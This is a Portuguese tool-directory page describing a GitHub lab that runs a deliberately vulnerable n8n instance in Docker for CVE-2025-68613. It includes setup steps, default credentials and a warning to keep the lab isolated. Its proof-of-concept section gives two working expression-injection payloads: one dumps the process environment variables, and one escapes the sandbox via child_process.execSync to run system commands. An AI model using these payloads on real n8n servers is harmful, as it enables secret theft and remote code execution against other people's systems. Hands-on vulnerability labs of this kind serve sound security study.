Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68613-n8n-lab — Análise do CVE-2025-68613 | Kitploit
Ferramentas/GitHubGitHub/r4j3sh-com/cve-2025-68613-n8n-lab
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubr4j3sh-com/cve-2025-68613-n8n-lab

CVE-2025-68613-n8n-lab

Análise do CVE-2025-68613

Ver Repositório
2há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Laboratório Local n8n CVE-2025-68613

Este repositório fornece uma configuração simples de Docker Compose que executa uma instância vulnerável do n8n para testes locais de CVE-2025-68613.

Requisitos

  • Docker Desktop ou Docker Engine
  • Docker Compose v2

Início rápido

  1. Inicie o contêiner:

    root@kitploit:~
    docker compose up -d
    
  2. Abra o n8n no seu navegador:

    • http://localhost:5678
  3. Faça login com as credenciais padrão definidas em docker-compose.yml:

    • Username: admin
    • Password: password

Parar e limpar

root@kitploit:~
docker compose down

Aviso e segurança

Baixar ferramenta

Este ambiente é apenas para testes locais e isolados. Não exponha esta instância à internet pública ou a qualquer rede não confiável. Mantenha-a em um segmento de rede privado, somente local, e separado dos sistemas de produção. Use por sua conta e risco.

Verificar a Vulnerabilidade (Prova de Conceito)

Assim que o contêiner estiver em execução, você pode acessar a interface do n8n em http://localhost:5678. Para testar a vulnerabilidade, você injetará uma carga útil JavaScript maliciosa em um campo de expressão. Passos para Reproduzir:

  1. Faça login: Acesse o painel (se você configurou autenticação básica, use as credenciais fornecidas; caso contrário, crie uma nova conta de proprietário).
  2. Crie um Workflow: Clique em "Add Workflow" ou navegue até https://n8n.example.com/workflow/new.
  3. Adicione um Nó: Adicione um nó "Set".
  4. Injete a Carga Útil: No campo "Value" do nó Set (certifique-se de alternar para o modo "Expression", se disponível, ou simplesmente cole a sintaxe que o n8n interpreta como uma expressão), insira uma das seguintes cargas úteis: Teste 1: Exfiltração de Variáveis de Ambiente Esta carga útil tenta acessar as variáveis de ambiente do processo, que geralmente contêm segredos.
root@kitploit:~
{{ (function() { return this.process.env; })() }}

env exfilteration

Teste 2: Execução Remota de Código (RCE) Esta carga útil tenta carregar o módulo child_process para executar comandos do sistema (por exemplo, whoami).

root@kitploit:~
{{ (function() {
    var require = this.process.mainModule.require;
    var execSync = require('child_process').execSync;
    return execSync('whoami').toString();
})() }}

RCE example for id command

Resultado Esperado: Se o ambiente estiver vulnerável, o painel "Output" do nó Set exibirá o resultado do comando (por exemplo, root ou o usuário do n8n) ou um objeto JSON contendo as variáveis de ambiente. Se a instância estivesse corrigida (por exemplo, versão 1.122.0+), o sandbox retornaria um objeto vazio ou um erro.